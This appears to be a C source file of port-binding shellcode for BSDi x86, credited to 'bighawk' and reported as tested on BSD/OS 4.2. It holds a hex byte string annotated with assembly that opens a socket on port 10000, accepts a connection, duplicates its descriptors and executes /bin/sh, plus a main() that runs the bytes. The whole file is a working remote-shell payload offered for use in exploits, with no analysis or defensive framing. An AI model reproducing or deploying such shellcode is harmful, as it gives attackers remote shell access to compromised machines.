/* 87 bytes portbinding shellcode - BSDi-x86
 * - by bighawk (bighawk@warfare.com)
 *
 * Tested on: BSDI BSD/OS 4.2
 */

char code[] =

   "\xb8\xff\xf8\xff\x3c"	// mov	  eax, 03cfff8ffh
   "\xf7\xd0"			// not    eax
   "\x50"			// push   eax
   "\x31\xc0"			// xor    eax, eax
   "\xb0\x9a"			// mov    al, 09ah
   "\x50"			// push   eax
   "\x89\xe7"			// mov    edi, esp
   "\x31\xdb"			// xor	  ebx, ebx
   "\xf7\xe3"			// mul	  ebx
   "\x53"			// push	  ebx
   "\x43"			// inc	  ebx
   "\x53"			// push	  ebx
   "\x43"			// inc	  ebx
   "\x53"			// push	  ebx
   "\xb0\x61"			// mov	  al, 97
   "\xff\xd7"			// call	  edi
   "\x89\xc6"			// mov	  esi, eax
   "\x52"			// push	  edx
   "\x66\x68\x27\x10"		// push	  word 4135
   "\x66\x53"			// push	  bx
   "\x89\xe5"			// mov	  ebp, esp
   "\x6a\x10"			// push	  byte 16
   "\x55"			// push	  ebp
   "\x56"			// push	  esi
   "\xb0\x68"			// mov	  al, 104
   "\xff\xd7"			// call	  edi
   "\xb0\x6a"			// mov	  al, 106
   "\xff\xd7"			// call	  edi
   "\x52"			// push	  edx
   "\x52"			// push	  edx
   "\x56"			// push	  esi
   "\xb0\x1e"			// mov	  al, 30
   "\xff\xd7"			// call	  edi
   "\x53"			// push	  ebx
   "\x50"			// push	  eax
   "\xb0\x5a"			// mov	  al, 90
   "\xff\xd7"			// call	  edi
   "\x4b"			// dec	  ebx
   "\x79\xf7"			// jns	  duploop
   "\x50"			// push	  eax
   "\x68\x2f\x2f\x73\x68"	// push   dword 68732f2fh
   "\x68\x2f\x62\x69\x6e"	// push   dword 6e69622fh
   "\x89\xe3"			// mov    ebx, esp
   "\x50"			// push	  eax
   "\x54"			// push	  esp
   "\x53"			// push	  ebx
   "\xb0\x3b"			// mov	  al, 59
   "\xff\xd7";			// call	  edi


main() {
  void (*a)() = (void *)code;
  printf("size: %d bytes\n", strlen(code));
  a();
}